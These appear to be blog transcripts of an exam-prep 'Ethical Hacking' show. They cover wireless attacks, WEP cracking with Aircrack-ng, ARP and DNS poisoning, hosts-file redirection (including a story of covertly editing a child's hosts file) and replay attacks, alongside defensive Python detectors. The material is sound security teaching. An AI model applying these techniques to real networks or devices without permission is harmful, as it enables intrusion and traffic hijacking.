Ethical Hacking

By vijaykumar Devireddy

Ethical is what you do and what you think, which makes you good among everyone! What if there is no one watching you in the internet world? What you do then is what makes you ethical. Be a hacker!!



What do you know about Physical Security?

Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 88. Today we're going to discuss physical security.

Physical security is really important to your organization's network security. After all, if an attacker is able to touch your network, your servers, or your workstations, they can take control over those devices and do whatever they want with them. While we've been talking a lot in this course about all of the logical protections you can put in place, things like firewalls and intrusion detection systems, router ACLs, passwords, encryption, and all sorts of things like that, our physical security is just as important.

Now, physical security is usually broken down into three main areas: the perimeter, the building, and the room itself. When I talk about the perimeter, I'm talking about what is in my way as I approach your building. Are there fences? Are there guards? Is there some sort of vehicle access point? All of those things make up our perimeter: what keeps us at bay and away from the building.

Next, we get to the building security. Is the front door unlocked? Can I walk right in? Do I have to show my ID? Do I have to check in with somebody? What are the different controls you're putting in place to secure that building?

And then finally we have the security of the room where your equipment is located. If this is an office, it's going to be someplace where people actually work, so people have to be able to get in there to access those terminals. How are you keeping unauthorized people out of those offices? And if you're dealing with a server room or a networking closet, those are places that people don't normally work inside of. So when nobody's in there, we should be locking them using some sort of locking mechanism, whether that's a door lock, an electronic lock, or some other mechanism. We'll talk about all of that inside this section of the episode.



Jan 28, 2022 (04:32)
Other Wireless Technologies that you wanted to know about...

Hello everyone, welcome to the show "Ethical Hacking", episode 87. Today we are going to discuss other wireless technologies.

We just spent a lot of time talking about wireless networks, but there are other wireless networks out there besides Wi-Fi. These include things like Bluetooth, RFID, Near Field Communication, cellular, GPS, and satellite communications.

Previously, we've talked about some vulnerabilities with Bluetooth. I want to remind you of two big terms when it comes to Bluetooth: bluejacking and bluesnarfing. I'm covering these again because I guarantee you're going to get at least one question on test day about either bluejacking or bluesnarfing; the exam really loves to ask about those for some reason. Bluejacking is the sending of unsolicited messages to Bluetooth-enabled devices such as mobile phones and tablets. Bluesnarfing, on the other hand, is the unauthorized access of information from a wireless device through a Bluetooth connection. So, to simplify this for the exam, I want you to remember this: bluejacking sends information to a device, whereas bluesnarfing takes information from a device. If you remember those two things, you'll do great on the exam. Also, when it comes to Bluetooth, remember you don't want to allow your device to use the default PIN for its pairing operations. You should always change the PIN to something more secure than 1234 or 0000.

Next, we have Radio Frequency Identification, or RFID. RFID devices have an embedded radio frequency signal that's used to transmit identifying information about the device or the token to a reader that's trying to pick it up. RFID refers to a large category of devices and technologies, but, for the exam, the specifics of RFID are not that important. Instead, you need to focus on the fact that RFID devices can send information from a card to a reader to provide authentication or identification. For example, one of the most common uses of RFID is a card that looks like a credit card and can be used as part of your alarm system or door access system. With these cards, you swipe your card over the reader, and it identifies you and allows you to enter the building. Because there are so many different types of RFID devices, RFID can operate in either very close environments or very far environments. It can be as close as 10 centimeters from the reader or as far as 200 meters from the reader, depending on the particular device and technology in use. Because of that large distance, RFID is subject to eavesdropping: the ability to capture, replay, and rebroadcast its radio frequency signal as part of a larger attack.

To minimize the ability to eavesdrop on RFID, an idea called Near Field Communication was invented. Near Field Communication, or NFC, allows two devices to transmit information when they're in close proximity to each other. This occurs using an automated pairing process and transmission process for that data. For example, some cellphones have the ability to pass photographs back and forth when you touch the phones together. Other uses of NFC are commonplace in payment systems. For example, I have an iPhone, and I can hold it over a credit card terminal to pay with my credit card that's linked through Apple Pay. This is an example of a Near Field Communication device. Just like RFID, we do have to worry about the possibility of interception of that wireless information, because it could be replayed and rebroadcast. Luckily for us, NFC does require the devices to be very close for the communication to work.


Jan 20, 2022 (11:53)
Wireless Attacks that you need to be aware of.

Hello everyone, welcome to the show "Ethical Hacking", episode 86. Today we are going to discuss wireless attacks.

So we've talked about securing our wireless networks. Let's now spend a few minutes talking about the different types of attacks that focus on our wireless networks.

The first is war driving. War driving is the act of searching for wireless networks by driving around until you find them. You could try this tonight: go sit in the back seat of your car, have your friend or your wife drive you around the neighborhood, and see which networks you can connect to. That's the idea here. They're simply going to drive around and hunt for networks. Now, the attackers here are going to use different tools to do this. They can use wireless survey tools or other open source attack tools, but the common theme is just finding out what networks are around and where you can access them from. Why would an attacker want to find open wireless networks, or networks that they can get on to? It's not necessarily to attack your network, but to attack other networks through your network. That way, if they are doing some hacking or something like that, it traces back to your home and your home network, as opposed to tracing back to them.

The next type of attack is called war chalking. War chalking is the act of physically drawing symbols in public places to denote the open, closed, or protected networks that are in range. It gets its name because in the early days people would actually take chalk and draw different symbols on a telephone pole to tell other people what was there. An example of this might be that, as you're war driving, you find an open network. If you did, you could find a telephone pole nearby and mark it with a symbol like this: two open half circles faced back to back, with the SSID written above them and a number below to signify the bandwidth of the network. After all, attackers can be nice people too. They like to share their findings with others, and they wouldn't want somebody else wasting their time looking for a network only to find it has low bandwidth. So by marking that down, you can help other people avoid that network. In addition to open networks, you may find closed networks. If you find a closed network, it's going to be a closed circle with the SSID written above it and the bandwidth written below it. This tells us that the network has some kind of encryption; it's closed, but we haven't quite figured out the password yet. Now, if we do figure out the password, we can use another symbol: we have the closed circle, the SSID on the top left, the password on the top right, and the bandwidth below it. Inside the circle we might write something like W, or WEP, or WPA2, so people know what type of encryption they need to connect to that network. As I said, war chalking is not nearly as popular as it used to be. In fact, we don't really see a lot of these symbols around in the city anymore. Instead, most of this is being done digitally, as part of websites or other apps that hackers use to share their finds, so people know what other kinds of WiFi are out there.

The next attack we have is known as an IV attack. An IV attack occurs when an attacker observes the operation of a cipher being used with several different keys and finds the mathematical relationship between those keys to determine the cleartext data. I know that sounds really complicated, but the good news is you don't have to do the math to do it; there are programs that do it for you. This happened with WEP because of its 24-bit initialization vector. That makes it very easy to crack WEP, because there are programs that do it for us.


Jan 13, 2022 (08:15)
Where exactly should wireless access points be placed in our organization or our home?

Hello everyone, welcome to the show "Ethical Hacking", episode 85. Today we are going to discuss wireless access points.

In addition to selecting the right encryption, it's also important to select the right placement and configuration of your wireless access points in order to achieve a good security posture. Most small office, home office wireless systems rely on a single point to multi-point setup. This relies on having a single access point that services all of the wireless clients. For example, on this floor plan, you can see the strongest signal is the red spot, centered around a single wireless access point, and all of the other office cubicles are connecting back into it. In the next example, you can see a multi-point to multi-point system. This has multiple access points that are used to provide the wireless network services in an ESS, or extended service set, configuration. They all work together to provide one common network that's supported by these multiple access points.

Now, in both of the previous examples, the wireless access points are using an omnidirectional antenna. This means that the access point radiates its signal equally in every direction. This can be good from a coverage perspective, but it is also dangerous. You may want to control which direction the signal is actually radiated, and if you do, you can do that using a bidirectional or a unidirectional antenna. For example, with a unidirectional antenna, all of the transmission power is focused in a single direction. This allows you to choose which areas receive the signal and which ones don't. So in this example, we're using a left-side focused antenna, and it only transmits out to computers on that side of the building, while the computers on the right remain in an uncovered area and don't get any signal.

Now, we talked about this back in our Network Plus curriculum as well, but from an operational standpoint, when we're talking Network Plus, we're trying to increase the coverage to all areas. From a security perspective, though, we may actually want to limit the area of coverage. Let's look at our heat map once more. Here you can see an extended service set configuration with two access points. Each of those access points has an omnidirectional antenna. This is giving us good, adequate coverage around the office space, as you can see inside the floor plan. So our network technician for Network Plus did a good job here. Now, for this office, each cubicle also has a wired physical connection, but the access point is there just to provide the employees access while they're sitting at those conference tables in the middle, or if they're walking around using their cellphones. All of this is great, and there's good coverage, meaning that it's meeting our operational needs. But you'll also notice the orange and yellow areas, which represent the medium and lower signal areas that are radiating outside the walls of the building.


Jan 12, 2022 (11:18)
Wireless encryption: explore the vulnerabilities it had before you use it.

Hello everyone, welcome to the show "Ethical Hacking", episode 84. Today we are going to discuss wireless encryption.

Another huge vulnerability in wireless networks is the encryption that you choose to use. In this lesson, we're going to do a quick review of the wireless encryption types that you learned back in your Network Plus studies. The reason for this is that encryption of the data being transmitted is paramount to increasing the security of your wireless networks.

Now, most wireless encryption schemes rely on a pre-shared key. This is when the access point and the client use the same encryption key to encrypt and decrypt the data. The problem with this is that scalability becomes difficult. Think about it: when a friend comes over to your house to use your WiFi, you have to tell him your password. Now, if you have 50 friends come over, you're going to tell 50 different people your password, and now all 50 of them know your password. So this is one of the first problems that we have with wireless encryption: if you're going to use a pre-shared key, you've got to figure out a secure way to distribute that key to everybody and keep it secret. If all 50 people know your password, then it's probably not that secret anymore.

Now, there are three main types of encryption in use for wireless networks: WEP, WPA, and WPA2.

WEP is our first one. WEP is Wired Equivalent Privacy. This came from the original 802.11 wireless security standard, and it claimed to be as secure as a wired network. I'm going to prove this wrong to you in our demonstration later, because we're going to brute-force WEP and break it in about three minutes. WEP was originally used with a static 40-bit pre-shared encryption key, but later it was upgraded to a 64-bit key, and then again to a 128-bit key. This isn't the main problem with WEP, though. The main problem is the 24-bit Initialization Vector, or IV, that it uses in establishing the connection, and it's sent in clear text. As I said, WEP is not very secure, and because of this weak Initialization Vector, we're going to be able to brute-force WEP in just a couple of minutes using Aircrack-ng and other tools.

So, to replace WEP, they came up with WPA. WPA is the WiFi Protected Access standard. It uses the Temporal Key Integrity Protocol, or TKIP, which uses a 48-bit Initialization Vector instead of the 24-bit Initialization Vector used by WEP. The encryption that it uses is Rivest Cipher 4, or RC4, and it added Message Integrity Checking, or MIC. It uses all of this to make sure that the data is secure and to ensure that it's not modified in transit. Overall, it's a pretty good standard, but it does have some flaws, and so version 2 was released to fix those.

WPA version 2, or WiFi Protected Access version 2, was created as part of the 802.11i standard to provide stronger encryption and better integrity checking. The integrity checking is conducted through CCMP, which is the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol. The encryption uses AES, the Advanced Encryption Standard. AES supports a 128-bit key or higher, and WPA2 uses either a personal mode, with pretty short keys, or an enterprise mode, with centralized authentication via a RADIUS server or another centralized server, to handle that password distribution we were talking about.

Now, I want to pause here for a second and, before we go any further, give you a couple of quick exam tips. First, if you're asked about WiFi and the question uses the word "Open", it's usually looking for some kind of answer that says the network has no security, or no protection.
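To put numbers on why a 24-bit IV is the weak point, here is an added example (not code from the episode) that computes how many frames it takes before an IV value repeats, for WEP's 24-bit IV and TKIP's 48-bit IV; the frame rate used for the exhaustion estimate is an assumption, not a figure from the episode.

```python
import math

# Added example: quantify how quickly a per-frame initialization vector (IV) repeats.
# WEP uses a 24-bit IV (the episode's "main problem"); WPA/TKIP widened it to 48 bits.
# Once an IV repeats under the same key, the RC4 keystream repeats too, which is what
# the recovery tools the episode mentions rely on.

def exact_collision_probability(iv_bits, frames):
    """P(at least one IV repeat) after `frames` IVs chosen at random from 2**iv_bits values.
    Exact birthday computation; fine for a few thousand frames, too slow for millions."""
    space = 2 ** iv_bits
    if frames > space:
        return 1.0          # pigeonhole: more frames than IV values guarantees a repeat
    p_no_repeat = 1.0
    for i in range(frames):
        p_no_repeat *= 1.0 - i / space
    return 1.0 - p_no_repeat


def frames_for_repeat_probability(iv_bits, probability=0.5):
    """Frames needed before an IV repeat is at least `probability` likely.
    Closed-form birthday bound n ~= sqrt(-2 N ln(1 - p)); within a frame of the exact value."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(-2.0 * space * math.log(1.0 - probability)))


def seconds_until_space_exhausted(iv_bits, frames_per_second):
    """Time until every IV value has been used once at the given frame rate.
    The rate is supplied by the caller and is an assumption, not a figure from the episode."""
    return 2 ** iv_bits / frames_per_second


if __name__ == "__main__":
    for bits in (24, 48):
        n = frames_for_repeat_probability(bits)
        hours = seconds_until_space_exhausted(bits, 1000) / 3600   # assumed 1000 frames/s
        print(f"{bits}-bit IV: 50% chance of a repeat after ~{n:,} frames; "
              f"full IV space used up in ~{hours:,.1f} h at 1000 frames/s")
```

The 24-bit space gives a coin-flip chance of a repeat after only a few thousand frames, while the 48-bit space needs tens of millions.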


Jan 11, 2022 (13:26)
How to secure Wi-Fi devices?

Hello everyone, welcome to the show "Ethical Hacking", episode 83. Today we are going to discuss securing WiFi devices.

Wireless devices are much less secure than our traditional networks because their data streams are simply flying through the air, waiting to be gobbled up by some attacker sitting out there. When we talked about wiretapping in the last lesson, we talked about having to gain access to the network physically. With a wireless network that challenge is eliminated, because the network is literally floating in the airwaves. In this lesson we're going to discuss some of the basic vulnerabilities associated with wireless networks and how you can combat them.

First, the administrative access on the wireless access point is a vulnerability. Usually these have default usernames and passwords like admin/admin, as we discussed before, and you have to make sure you secure them. Also, remote administration should be disabled on your wireless access points. Remote administration is something that allows you to connect over the internet and then make changes to your wireless access point. You don't need that. Instead, you should turn it off and make sure that you're administering it locally, inside your network only, to minimize that risk.

The second vulnerability we have to think about is the service set identifier, or the SSID. Back in Network Plus you learned that the SSID is what uniquely identifies the network, and it acts as the name of the wireless access point that the clients are going to use to connect to it. For example, if you came by my offices, you would see that my network has the oh-so-hard-to-guess name of vijay. Anyone who sees that might think, hey, that might be Vijay Kumar's WiFi, right? Well, that's the SSID's job. It sits there and broadcasts out: hey, I'm here, I'm here, I'm vijay, I'm vijay, I'm vijay. Now, according to the usual advice, you should disable the broadcast, so clients have to already know the name of it prior to connecting to it. They say this is a way to slow down the bad guy from attacking your network. As an ethical hacker myself, I can tell you that it isn't really going to slow me down. If you aren't broadcasting openly, your clients are still sending the same wireless access point information, and that SSID, with every single communication they make. It takes me about five seconds to find out your SSID if you're not broadcasting. So by disabling it you're just making operations harder for yourself, and you're not really gaining any security here. Now, all of that said, if you're asked on the exam, disabling SSID broadcast is considered good security and you should implement it. In the real world, it really doesn't matter that much.

The next one we're going to talk about is rogue access points. Rogue access points are another vulnerability out there. A rogue access point is an unauthorized wireless access point or wireless router that somebody connected to your network, and it's going to give access to your secure network. For example, say you walk around your office and find that somebody decided they didn't want to plug into that RJ45 jack all the way in the back wall over there, so they put in a wireless access point so they could access the network throughout the whole room. That makes operations easy for them, but that wireless access point wasn't properly configured. This is going to extend your wired network into the wireless realm, and it can introduce its own DHCP server and cause all sorts of other issues. To prevent this you should enable MAC filtering on the network, use network access control, and run a good IDS or IPS on your network that can detect or prevent these devices when they initially try to connect.


Jan 01, 2022 (12:21)
How to secure network media?

Hello everyone, welcome to the show "Ethical Hacking", episode 82. Today we are going to discuss securing network media.

Network media is the cabling that makes up our network. This can be copper, fiber optic, or coaxial, and it's used as the connectivity method inside of our wired networks. Now, in addition to all the cables, there are other parts of the cabling plant we have to think about. All those intermediate devices like patch panels, punch-down blocks, and network jacks make up the cabling plant that runs throughout our organization. And each part of that can be a vulnerability for us.

The first vulnerability I want to discuss is EMI. This stands for electromagnetic interference. Electromagnetic interference is a disturbance that can affect electrical circuits, devices, and cables due to radiation or electromagnetic conduction. EMI is something that happens normally inside our businesses and inside our homes. EMI is caused by all sorts of things, like televisions, microwaves, cordless phones, baby monitors, motors like the one inside your vacuum, and other devices. Anything that is a powered device, even a handheld drill, can cause electromagnetic interference. To minimize EMI you need to install shielding around the source; for instance, your air conditioner lets off a lot of EMI, and you could put shielding around that. Or you can shield the cable itself by choosing shielded twisted-pair. STP cables, or shielded twisted-pair, have foil around either each twisted pair in the cable or around the entire bundle of twisted pairs to prevent emanations out of the cable or interference entering into the cable. STP gives you a double benefit: it keeps things out, and it keeps things in. This is good for security and helps minimize this vulnerability.

The next vulnerability we have is called radio frequency interference, or RFI. RFI is just another type of interference, like EMI. Like EMI, it's a disturbance that can affect your electrical circuits, your devices, and your cables. But instead of being caused by electrical waves, it's caused by radio waves, most often from AM and FM transmission towers or cellular phone towers. Cell towers and radio towers near your office can be a big source of RFI in your wireless networks. And when you have a significant amount of RFI, this can cause network connectivity problems for your wired networks, as well as disturbing your wireless networks too. This is something that you're going to have to address, and a lot of it is going to be addressed by shielding the building or getting stronger devices that can overcome the radio frequency interference that's occurring.

Another vulnerability we have is what's known as crosstalk. Crosstalk occurs when a signal is transmitted on one copper wire and it creates an undesired effect on another copper wire. So, when we think about having two copper wires, like inside of a twisted-pair cable, if the shielding that protects those wires comes off, then we can actually have crossover from one wire to another. That causes interference because of the data emanations and EMI. Crosstalk is essentially that, but in very close proximity. This becomes very common with older cable network types, things like Cat3 networks, or even some early Cat5 networks. Most of our Cat5E and Cat6A networks aren't subject to crosstalk nearly as much. Another place I see crosstalk happen a lot is if you have punch-down blocks and you decide to use an older terminal, like the old 66 blocks that were used for phone lines, and try to use that for networks. Networks should always use a 110 block, like you learned back in Network Plus, because it gives more spacing and prevents crosstalk from occurring.

The next thing I want to talk about here is STP cables, because STP cables are really helpful to our networks. They can prevent some of that RFI, they can prevent EMI, and they can help with crosstalk.

Dec 29, 2021 (21:50)
How to secure network devices? What are network devices?

Hello everyone, welcome to the show "Ethical Hacking", episode 81. Today we are going to discuss securing network devices.

Network devices include things like switches, routers, firewalls, IDS, IPS, and more. Each of these different devices has its own vulnerabilities that have to be addressed, but here we're going to focus on the most common vulnerabilities across all of these different devices.

The first vulnerability we're going to talk about is default accounts. These are accounts that exist on a device straight out of the box when you buy it. So for example, if you buy a small office, home office wireless access point, like a Linksys or a D-Link or something like that, it's going to have some accounts already established on there. It might have one like admin, or administrator, or user, or something of that nature. All of these default accounts are very easy to figure out and very easy to guess. So it's important for you to actually change these names so that they're not something that an attacker can easily guess, leaving them only to guess your password. Now, this applies to your organizations as well. You want to make sure that your naming schemes aren't really easy to guess. Unfortunately, though, most organizations are going to use a common naming scheme for all of their users. For example, most organizations like to use first name dot last name. So if your name was Vijay Kumar like me, you're vijaykumar@yourcompany.com. Or sometimes they'll do something like vkumar@yourcompany.com, where it's the first letter and the last name. Any of these make for a great, normal, easy to understand naming scheme. That makes operations very easy, but it also makes it fairly easy to guess. Because if I see that Jason.Dion@whatever.com is one email, then I can probably guess that Susan.Smith is also there, or whoever else I'm dealing with. You want to make sure you're thinking about this, that you're starting to add diversity, and that those default user names are changed.

The next thing you want to think about is the device username as well. There are defaults for this too. I've seen people call them router or switch as the usernames. That's not a good plan either. When you're creating a device account, you want it to be something more complex. So maybe it's rtr for router with a couple of numbers after it, something that's not easily guessable. That's what I'm talking about here as we try to change these default accounts.

The next issue we have goes right along with default accounts: it's weak passwords. Don't leave passwords at their default. For instance, those Linksys routers we all have: they're admin for the user, admin for the password. That is horrible. We also don't want to use any words that are in the dictionary. Your passwords need to be long, strong, and complex: at least 14 characters long, with upper case, lower case, special characters, and numbers. By having this mixture, you increase the time it takes to brute-force that password and make it much harder for an attacker to break into your network. So for example, if I have the password "password", which is all lower case, I'm only using 26 different options, because the lower case letters are A through Z. If I look at that, that's considered a weak password. If I add some upper case to it, now I have 52 characters, because I have upper case and lower case. So I have something like "PaSSworD", where the P, the S's, and the D are upper case and the other letters are lower case. If I want to make it even more secure, I can add numbers to that, and I'll change out the S's for fives and the Os for zeroes, things like that. This gives us more choices again, because we have 26 lower case, 26 upper case, and 10 numbers, zero through nine. But if we want it to be the best and most secure that it possibly can be, we want to add symbols to this too. And so now we're going to get something like 70 different options.


Dec 27, 2021 (15:14)
How can we secure our networks?

Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 80. Today we're going to discuss how we can secure our networks.

In this section of the course, we're going to talk about securing your wired and wireless networks. We're going to start out with wired network devices, things like switches and routers, and then we'll move into the cabling that helps put all these networks together. After that, we're going to start talking about wireless networks, how we can better secure them, and all the different types of attacks that exist for wireless networks. We'll even go through a demonstration in this section where I'm going to show you how easy it is to break wireless encryption, and we'll be able to do that in just about two or three minutes. So it's really important to understand how to secure your networks properly so attackers can't do this to you. Finally, we're going to round out this section by covering other types of wireless technology in addition to WiFi, things like RFID, near-field communications, Bluetooth, satellite communication, GPS, cellular, and others. So let's get started.



Dec 26, 2021 (03:28)
What is ARP? Where is it used? How is ARP poisoning done?

Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 79. Today we're going to discuss ARP poisoning.

In the last lesson, we talked about the concept of DNS poisoning. In this lesson, I want to cover the concept of ARP poisoning with you fairly quickly. ARP stands for the Address Resolution Protocol, like you learned back in Network Plus, and it's used to convert an IP address into a MAC address. If you remember back from Network Plus and our OSI model lesson, as data moves down the OSI stack, it uses IP addresses to transmit packets all over the world from router to router. But once it finds the right router, that router converts that IP address into a MAC address and passes it on to the switches inside of its own network, and that helps it deliver the information using frames inside the data link layer.

Now, ARP poisoning exploits the way that an Ethernet network works. It enables an attacker to steal, modify, or redirect frames of information on the network. The concept here is that the attacker associates their MAC address with the IP address of another device within the network. This way, whenever the router asks for the MAC address that's associated with that IP, it gets the attacker's MAC address instead of the legitimate user's. This allows the attacker to essentially take over any session that would involve MAC addresses at layer two of the OSI model. Also, if the attacker wanted to get really creative here, they could set up a man in the middle using this technique by taking over the MAC address first, then passing the data back and forth between the victim and the rest of the network.

To prevent ARP poisoning, you should set up good VLAN segmentation within your network, and also set up DHCP snooping to ensure that IP addresses aren't being stolen and taken over by an attacker.
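The symptom the episode describes, one MAC address suddenly answering for another device's IP, is something a passive monitor on the segment can flag. The following is an added example, not code from the episode: it runs a detector over a constructed log of ARP replies, and the trusted binding table standing in for DHCP snooping data is likewise constructed.

```python
from collections import defaultdict

# Added example: spot ARP poisoning from the symptoms the episode describes, namely one MAC
# address claiming the IP of another device (typically the gateway) so that frames get
# redirected through it. Input is a constructed log of ARP replies in the form
# "time sender_ip sender_mac", as a passive monitor on the segment might record them.
# The last two lines are the poisoning: the host at ...:30 answers for the gateway and
# for another client, which is the man-in-the-middle setup the episode mentions.
ARP_REPLIES = """\
10:00:01 192.168.1.1  aa:bb:cc:00:00:01
10:00:02 192.168.1.20 aa:bb:cc:00:00:20
10:00:03 192.168.1.30 aa:bb:cc:00:00:30
10:00:09 192.168.1.1  aa:bb:cc:00:00:30
10:00:10 192.168.1.20 aa:bb:cc:00:00:30
"""

# Known-good IP-to-MAC bindings, e.g. the gateway, as a DHCP snooping binding table or a
# static entry would provide them (constructed for this example).
TRUSTED_BINDINGS = {"192.168.1.1": "aa:bb:cc:00:00:01"}


def parse_replies(text):
    """Turn the log text into (time, ip, mac) tuples, normalising MAC case."""
    replies = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, mac = line.split()
        replies.append((ts, ip, mac.lower()))
    return replies


def detect_poisoning(replies, trusted=TRUSTED_BINDINGS):
    """Return alerts as (time, kind, subject, detail) tuples.

    kinds:
      trusted-binding-violation  a reply contradicts a known-good binding
      mac-changed                an IP seen before now answers from a different MAC
      mac-claims-multiple-ips    one MAC has answered for more than one IP on the segment
    """
    alerts = []
    seen = {}                   # ip -> last MAC that answered for it
    claims = defaultdict(set)   # mac -> set of IPs it has answered for
    for ts, ip, mac in replies:
        if ip in trusted and trusted[ip] != mac:
            alerts.append((ts, "trusted-binding-violation", ip, mac))
        if ip in seen and seen[ip] != mac:
            alerts.append((ts, "mac-changed", ip, f"{seen[ip]} -> {mac}"))
        seen[ip] = mac
        is_new_claim = ip not in claims[mac]
        claims[mac].add(ip)
        if is_new_claim and len(claims[mac]) > 1:
            alerts.append((ts, "mac-claims-multiple-ips", mac, sorted(claims[mac])))
    return alerts


if __name__ == "__main__":
    for alert in detect_poisoning(parse_replies(ARP_REPLIES)):
        print(*alert)
```

A switch with DHCP snooping and dynamic ARP inspection applies the same trusted-binding check inline and drops the offending reply instead of only alerting on it.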



Dec 25, 2021 07:51
What is DNS ? How DNS(Domain Name Server) attacks can be performed ?


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 78. Today we're going to discuss DNS attacks. There are four different DNS attacks that you should know: DNS poisoning, unauthorized zone transfers, altered hosts files, and domain name kiting. DNS poisoning occurs when the name resolution information in a DNS server's cache is modified. The data is modified to redirect client computers to fraudulent or incorrect websites, usually as the first step of a follow-on attack. The DNS system was designed without much security built into it originally. This open architecture assumed a level of trust with all the other servers, which, as I already told you, is a pretty bad idea, and malicious attackers have taken advantage of that trust. DNS poisoning usually targets a company's internal DNS servers rather than the public DNS servers around the internet. With this type of attack, an internal client makes a request to go to a website like diontraining.com, and the client first checks with its local network's primary DNS server to see if it knows the IP address for that name. If someone has gone there recently, that IP address is already stored in the local cache, but if the cache was poisoned, the user is redirected to a malicious website instead of the one they wanted. To counter DNS poisoning, the DNS Security Extensions, or DNSSEC, were created. DNSSEC does not encrypt DNS traffic; instead it attaches digital signatures to DNS records, so that a resolver can verify that an answer really came from the zone's owner and wasn't altered or forged along the way. You can also reduce the chance of your DNS servers being poisoned by running the latest patches and updates, which among other things makes sure the resolver randomizes its source ports and transaction IDs so that forged answers are hard to slip in. Our next type of DNS attack is the unauthorized zone transfer. DNS servers are normally configured to provide their zone data to their secondary servers through a zone transfer, which replicates the information to those other servers. With an unauthorized transfer, an attacker requests a copy of that zone data, and if they receive it they now have a list of all of your server names and IP addresses, which helps them plan future attacks. Because of this, zone transfers should always be restricted to specific known and trusted servers only, and requests from anyone else should be refused. The third type of DNS attack is focused on the client itself. Every computer and workstation has a file on it called the hosts file. The hosts file is a plain text file that contains IP addresses and names. This is a reference that the operating system checks every time a name lookup is requested, before going to a DNS server. So if the hosts file contains the domain name being requested, the system simply uses the hosts file version of that information instead of going out to a DNS server to ask for it. So for example, one day my son was not doing his school work and it was really upsetting me. Instead, I kept going up there and seeing he was watching YouTube. So I logged into his computer, added the URL for YouTube into his hosts file, and pointed it to the IP address for his school's website. Now, any time my son typed in youtube.com, instead of getting the DNS lookup for YouTube and being directed to their server, he instead got the entry from the hosts file that I maliciously put in there, and it served up the home page for his school. Now, every time he tried to watch a video he was told, hey, you've got to go to school, right? I think this is pretty funny and you may think it's funny too, but he was not very happy about this change, and he couldn't for the life of him figure out why YouTube wouldn't come up on his laptop.
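
Because the operating system consults the hosts file before any DNS server, one added line is all it takes to hijack a name, whether by a parent or by malware. As an added example (not from the episode), the Python below parses a hosts file the way the resolver does (comments, several names per line, IPv4 and IPv6) and reports every entry that sends a non-local name somewhere other than loopback or 0.0.0.0. The file content is a constructed sample; on a real host read /etc/hosts or the Windows drivers\etc\hosts file instead.

```python
"""Audit a hosts file for entries that hijack name resolution (added example)."""
import ipaddress

# Constructed sample hosts file. On Linux/macOS the real file is /etc/hosts;
# on Windows it is C:\Windows\System32\drivers\etc\hosts.
SAMPLE_HOSTS = """\
# Constructed sample hosts file
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
127.0.1.1       vijay-laptop
0.0.0.0         ads.example.net                # ad-blocking sinkhole, harmless
198.51.100.7    youtube.com www.youtube.com    # redirected to the school site
203.0.113.9     update.example-vendor.com      # suspicious: vendor update host
"""

LOCAL_NAMES = {"localhost", "ip6-localhost", "ip6-loopback", "localhost.localdomain"}


def parse_hosts(text):
    """Yield (ip_address, hostname) pairs, one per name, from hosts-file text."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # strip trailing comments
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                              # malformed line, ignore it
        for name in fields[1:]:
            yield ip, name.lower()


def find_overrides(text, local_hostnames=()):
    """Return [(name, ip)] for entries that redirect a non-local name.

    Loopback and unspecified (0.0.0.0) targets only block a name, which is
    how ad blockers use the file; any other target silently sends the user
    to a host the domain's owner never chose, so those are reported.
    """
    allowed = LOCAL_NAMES | {h.lower() for h in local_hostnames}
    overrides = []
    for ip, name in parse_hosts(text):
        if name in allowed:
            continue
        if ip.is_loopback or ip.is_unspecified:
            continue
        overrides.append((name, str(ip)))
    return overrides


if __name__ == "__main__":
    for name, ip in find_overrides(SAMPLE_HOSTS, ["vijay-laptop"]):
        print(f"override: {name} -> {ip}")
```

On the sample it reports the two YouTube names and the vendor update host; the machine's own name and the ad sinkhole pass.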


Dec 18, 2021 12:48
How Transitive concept is used in Internet Attacks ?


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 77. Today we're going to discuss transitive attacks. Transitive attacks aren't really an actual type of attack but more of a conceptual method. The name comes from the transitive property we learned back in mathematics. Essentially, the transitive property says that if A equals B and B equals C, then by all logic A also equals C. Now, when it comes to security and people talk about the idea of a transitive attack, they're really focusing on the idea of trust. If one network trusts a second network, and that second network trusts a third network, then the first network effectively trusts the third network too, and so if an attacker can get into any one of those three networks, he can then get into the other two as well. This is based on that transitive trust. This is really important in the world of security, because whoever you trust, you're also trusting everyone they have ever trusted. Whenever you connect your network to somebody else's network using a trust relationship, you're inherently taking on all of the risk of their security posture, or lack of it, in addition to your own. Often in large enterprise networks we rely on trust relationships between different domains, because this helps us minimize the number of times someone has to authenticate over and over for a resource. But remember, whenever you sacrifice security in order to get better or quicker operations, there is a risk associated with it. So if your organization wishes to maintain a strong security posture, your systems should not assume trust, but instead should question and re-question every device and network they wish to connect to.



Dec 12, 2021 04:05
What is Replay Attack ? How it is performed...


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 76. Today we're going to discuss replay attacks. A replay attack is a network-based attack where valid data transmissions are fraudulently or maliciously re-broadcast, repeated or delayed. This works a lot like a session hijack, but it's a little bit different. With a session hijack the attacker is trying to modify the information being sent and received in real time, but with a replay attack we're simply trying to intercept it, analyze it and decide whether or not to send it again later. For example, if I were able to capture the exchange that occurs when you log into your bank with your username and password, I could replay that exchange to the bank later on in an attempt to log in as you, without ever knowing what your password is. That's the idea of a replay attack. To combat a replay attack, you should ensure that websites and devices use session tokens, nonces and timestamps to uniquely identify each authentication exchange, so that a captured copy is rejected the second time it shows up. Also, if you use multi-factor authentication, this can help prevent a logon session from being replayed, because the captured session doesn't have the next token: the random value from a one-time password changes every 30 to 60 seconds, so the old one is useless by the time the attacker replays it. One place where replay attacks have been used quite successfully is in the world of wireless authentication. By capturing a device's handshake onto the wireless network, you can replay it later to gain access to that network yourself, as if you were them. This was extremely common with the older protocols, especially Wired Equivalent Privacy, or WEP. So you should be using the latest protocols like WPA2 or WPA3 to help prevent and minimize your risk.
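
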